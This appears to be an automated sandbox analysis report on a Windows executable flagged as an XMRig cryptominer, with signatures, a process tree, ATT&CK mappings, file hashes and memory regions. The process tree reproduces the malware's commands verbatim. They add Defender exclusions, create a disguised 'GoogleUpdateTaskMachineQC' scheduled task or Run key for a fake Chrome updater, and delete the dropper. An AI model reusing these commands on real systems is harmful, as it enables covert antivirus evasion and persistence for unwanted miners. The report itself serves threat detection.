Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    389s
  • max time network
    1793s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Be5sCbvuma2nkHDa.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1356
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2548
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:1776
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2072
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        PID:1508
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        2⤵
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2740
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe qtdiqnkejoz
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:2724
    • C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      1⤵
        PID:2444
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {2F6C944B-2357-476A-9201-1473CADF52DC} S-1-5-18:NT AUTHORITY\System:Service:
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2496
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2936
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        1⤵
          PID:2452
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1180

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          379KB

          MD5

          38eb7a86313c1bd74ebccd21d5bbf60c

          SHA1

          a716cc6f6236f545372a4f65e49b0ef17123b197

          SHA256

          ae8545eb691fb5f50aeed953ce273d457907c2592b6e40381a0459002db27aad

          SHA512

          754b73e2c31ac4a08bb5fdb27f006de16127041722b25287e1196b8b38b2b4284e6f03d89fc87ff14e12c3b4921addd4fbc127cb89475e23d04ceacb56e4a442

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          318KB

          MD5

          7b220e33e38b7b5470d0b9900baa086d

          SHA1

          dbda21f63fb692ffc2b6c5d093b8de335402b8bb

          SHA256

          c0716dcea089875ae58b121dec0fc26ed4c0e9bde07a5d3e6bcba5f4c66b4659

          SHA512

          11fc33159718015e2ab0ec467da68a10a9f9763b2820519b15c9eee35a8225c2ca52172a641b70feca4e763ea8f49846b8a57f94f21f1101e2d1afdcd1d9820f

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBN4IYMJT6AX9M67LJ9Y.temp
          Filesize

          7KB

          MD5

          526989c1e5bc9fe4f8c3275c811372db

          SHA1

          039f52ea9d62185851fb8e788fd1713ff477a9f5

          SHA256

          bea90fa46179ccc0f6d5fd04250422990ed6ef3d1fa9d713f5fbe8c42b37c6d8

          SHA512

          8d3f10a3917b2ac2e03e6666f59decd4d65acbc00d34e49e6c1cb950141b56bd950c6e94df9771ad26e328e2786617c79d5d30f669269a19e2209e4117501357

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          347KB

          MD5

          37920a0383bbdf8de7e595ebaeb36f64

          SHA1

          e6397f7cddcb32c2750a72df528171c182983576

          SHA256

          3df0023f65fe7814388af2aeee802cad379580fb4783b17ebd14dbe013e5e125

          SHA512

          46f4227adb630202817559761ca039c6b1d7942f364c93822b9d07a3f0a241bba81c2900092ed118867031eb990e6e51c1e9e74b7d9bc89b0a3f6568d3a29f57

        • memory/1496-56-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/1496-55-0x0000000001350000-0x00000000013D0000-memory.dmp
          Filesize

          512KB

        • memory/1496-53-0x0000000001350000-0x00000000013D0000-memory.dmp
          Filesize

          512KB

        • memory/1496-50-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/1496-54-0x0000000001350000-0x00000000013D0000-memory.dmp
          Filesize

          512KB

        • memory/1496-52-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/1496-51-0x0000000001350000-0x00000000013D0000-memory.dmp
          Filesize

          512KB

        • memory/1692-9-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/1692-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp
          Filesize

          2.9MB

        • memory/1692-10-0x0000000002B50000-0x0000000002BD0000-memory.dmp
          Filesize

          512KB

        • memory/1692-12-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/1692-7-0x0000000001EB0000-0x0000000001EB8000-memory.dmp
          Filesize

          32KB

        • memory/1692-8-0x0000000002B50000-0x0000000002BD0000-memory.dmp
          Filesize

          512KB

        • memory/1692-6-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/1692-11-0x0000000002B50000-0x0000000002BD0000-memory.dmp
          Filesize

          512KB

        • memory/1748-47-0x000000000019B000-0x0000000000202000-memory.dmp
          Filesize

          412KB

        • memory/1748-49-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
          Filesize

          9.6MB

        • memory/1748-45-0x0000000000190000-0x0000000000210000-memory.dmp
          Filesize

          512KB

        • memory/1748-46-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
          Filesize

          9.6MB

        • memory/1748-48-0x0000000000190000-0x0000000000210000-memory.dmp
          Filesize

          512KB

        • memory/1748-44-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
          Filesize

          9.6MB

        • memory/2072-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-133-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-131-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-129-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-127-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-125-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-123-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-121-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-119-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-65-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-64-0x0000000000040000-0x0000000000060000-memory.dmp
          Filesize

          128KB

        • memory/2072-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-66-0x0000000000360000-0x0000000000380000-memory.dmp
          Filesize

          128KB

        • memory/2072-67-0x0000000000380000-0x00000000003A0000-memory.dmp
          Filesize

          128KB

        • memory/2072-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-69-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-71-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-74-0x0000000000380000-0x00000000003A0000-memory.dmp
          Filesize

          128KB

        • memory/2072-73-0x0000000000360000-0x0000000000380000-memory.dmp
          Filesize

          128KB

        • memory/2072-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-76-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-78-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2072-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/2116-18-0x000000001B500000-0x000000001B7E2000-memory.dmp
          Filesize

          2.9MB

        • memory/2116-19-0x00000000028A0000-0x00000000028A8000-memory.dmp
          Filesize

          32KB

        • memory/2116-21-0x00000000028B0000-0x0000000002930000-memory.dmp
          Filesize

          512KB

        • memory/2116-20-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
          Filesize

          9.6MB

        • memory/2116-22-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
          Filesize

          9.6MB

        • memory/2116-24-0x00000000028B0000-0x0000000002930000-memory.dmp
          Filesize

          512KB

        • memory/2116-23-0x00000000028B0000-0x0000000002930000-memory.dmp
          Filesize

          512KB

        • memory/2116-25-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp
          Filesize

          9.6MB

        • memory/2332-27-0x000000013F870000-0x000000013FA81000-memory.dmp
          Filesize

          2.1MB

        • memory/2332-0-0x000000013F870000-0x000000013FA81000-memory.dmp
          Filesize

          2.1MB

        • memory/2724-75-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2724-68-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2784-35-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/2784-33-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/2784-34-0x0000000002330000-0x00000000023B0000-memory.dmp
          Filesize

          512KB

        • memory/2784-39-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
          Filesize

          9.6MB

        • memory/2784-38-0x0000000002330000-0x00000000023B0000-memory.dmp
          Filesize

          512KB

        • memory/2784-37-0x0000000002330000-0x00000000023B0000-memory.dmp
          Filesize

          512KB

        • memory/2784-36-0x0000000002330000-0x00000000023B0000-memory.dmp
          Filesize

          512KB

        • memory/2936-63-0x000000013F930000-0x000000013FB41000-memory.dmp
          Filesize

          2.1MB

        • memory/2936-43-0x000000013F930000-0x000000013FB41000-memory.dmp
          Filesize

          2.1MB